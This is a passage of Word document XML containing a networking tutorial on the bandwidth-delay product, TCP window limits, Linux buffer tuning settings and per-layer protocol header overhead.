    <w:p w14:paraId="351C9D20" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Sub-6GHz 5G (the version with wider coverage) uses spectrum similar to 4G LTE, achieving 1–3 Gbps peak throughput with better propagation characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C4AEEA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="1287420C">
          <v:rect id="_x0000_i4469" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05771C21" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. The Bandwidth-Latency Product — The Most Important Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457EDEA7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What It Is and Why It Matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F307D24" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth-Delay Product (BDP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> is the amount of data "in flight" in a network path at any given moment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723DAB10" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D86E9D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BDP = Bandwidth × RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041842CC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="31C743B5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Example: 1 Gbps link, 100ms RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447D480D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BDP = 1,000,000,000 bits/second × 0.1 seconds = 100,000,000 bits = 100 Mb = 12.5 MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1541F7A3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>This means: to fully utilize a 1Gbps link with 100ms RTT, </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.5 megabytes of data must be in flight at all times</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — sent but not yet acknowledged. If less than 12.5MB is in flight, the pipe is not full and bandwidth is being wasted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC5E4AF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this matters for TCP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E2D775" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>TCP uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sliding window</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> protocol — the sender can have at most window_size bytes in flight at any time. The receiver's window (rwnd — receive window) is limited by the receiver's buffer size. The congestion window (cwnd) is limited by TCP's congestion control algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21705ABA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Effective throughput = min(rwnd, cwnd) / RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E556663" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>If min(rwnd, cwnd) is smaller than the BDP, the pipe is underutilized:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D45D57B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BB0B7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Scenario: 1Gbps link, 100ms RTT (BDP = 12.5MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50573EF0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">          Default TCP receive buffer: 4MB (common Linux default before tuning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E164A97" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78384EAE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Effective throughput = 4MB / 0.1s = 40 MB/s = 320 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232F6286" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="6BE36526" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>On a 1Gbps link, the default buffer size limits throughput to 320 Mbps (32% utilization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAC6509" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The remaining 68% of bandwidth is wasted — the pipe is not full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACB20F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is why long-fat networks (LFNs — high bandwidth, high latency paths like intercontinental fiber or satellite) are hard to utilize.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> The BDP is enormous, but default TCP buffer sizes are small. TCP cannot keep enough data in flight to fill the pipe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6137AE3B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Satellite Internet example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302403E6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B648B2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Starlink: 100–300 Mbps bandwidth, ~20ms RTT (low earth orbit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0FD312" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Geostationary satellite: 10–50 Mbps bandwidth, ~600ms RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26211D80" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="5F7587AC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BDP (Geostationary): 50 Mbps × 0.6s = 30 Mb = 3.75 MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE2B8F6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="26DE894A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Default TCP buffer (4MB) &gt; BDP (3.75MB) for geostationary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4245A025" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>So buffer isn't the bottleneck for geostationary satellite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D7121" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>But: 600ms RTT means TCP slow start is agonizingly slow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7889AF9D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Each slow start doubling takes 600ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552315D1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  - To grow cwnd from 10 segments (14KB) to 4MB requires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E08CF76" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">    log₂(4MB/14KB) ≈ 8 doublings × 600ms = 4.8 seconds just for slow start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730BC837" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Buffer Size Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260CEAD5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux TCP buffer tuning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5899A2CD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19077FDF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t># Current defaults</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC148FB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>net.core.rmem_default = 212992      (208 KB — default receive buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45199D26" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>net.core.wmem_default = 212992      (208 KB — default send buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AE9E17" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>net.core.rmem_max = 134217728       (128 MB — maximum receive buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF37F51" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>net.core.wmem_max = 134217728       (128 MB — maximum send buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6831A7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="27459B60" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t># TCP-specific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34668532" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>net.ipv4.tcp_rmem = 4096 131072 6291456   (min, default, max — auto-tuned)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10A867" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>net.ipv4.tcp_wmem = 4096 16384 4194304    (min, default, max — auto-tuned)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06195E13" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="163AAC89" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t># TCP auto-tuning (enabled by default on modern Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F9CEFF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>net.ipv4.tcp_moderate_rcvbuf = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0186F491" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP auto-tuning (tcp_moderate_rcvbuf):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Linux automatically adjusts receive buffer sizes based on the detected bandwidth and RTT, up to rmem_max. This eliminates the need to manually tune buffer sizes for most use cases — the kernel adapts to the measured BDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31610FAE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When auto-tuning is insufficient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A3581B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>High-bandwidth data center links (25Gbps, 100Gbps)</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> with even moderate latency (1ms): BDP = 25Gbps × 1ms = 25Mb = 3.1MB. Auto-tuning should handle this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C77FD9A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Long-haul intercontinental links (10Gbps, 200ms)</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t>: BDP = 10Gbps × 0.2s = 2Gb = 250MB. rmem_max must be set to at least 250MB and auto-tuning must be allowed to grow to this size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0248F3DC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If rmem_max is smaller than the BDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t>, auto-tuning cannot allocate enough buffer → bandwidth underutilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BFFC83" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="69FD7BA2">
          <v:rect id="_x0000_i4470" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37471345" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Network Layers and Bandwidth — The Overhead Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBB1B34" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol Overhead at Every Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710F6B43" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Every layer of the network stack adds headers — bytes that consume bandwidth but carry no application data. Understanding this overhead is critical for accurate bandwidth planning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7792CD37" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The overhead stack for a 1-byte HTTP/1.1 request over TCP/IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D7BC21" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50590F49" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Application data:    1 byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AC406F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="02309ECC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>HTTP/1.1 headers:    ~500 bytes minimum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E489BA1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628726B6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="75E4FFF0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>TCP header:          20 bytes (minimum, without options)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3B82A3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  src_port, dst_port (4 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0F8926" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  sequence_number (4 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320D39DE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  acknowledgment_number (4 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4071C2EE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  flags, window_size (4 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674FF0A9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  checksum, urgent_pointer (4 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D07930" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C5C83B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>TCP options:         12 bytes typical (SACK, timestamps, window scale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369F5634" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="19BAD4DF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>IP header:           20 bytes (IPv4) or 40 bytes (IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F852988" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  version, IHL, DSCP (1 byte each)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22971AED" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  total_length (2 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0CBBE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  identification, flags, fragment_offset (4 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5031A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  TTL, protocol (2 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3214D66F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  header_checksum (2 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64733FEE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  src_ip, dst_ip (8 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346884F9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
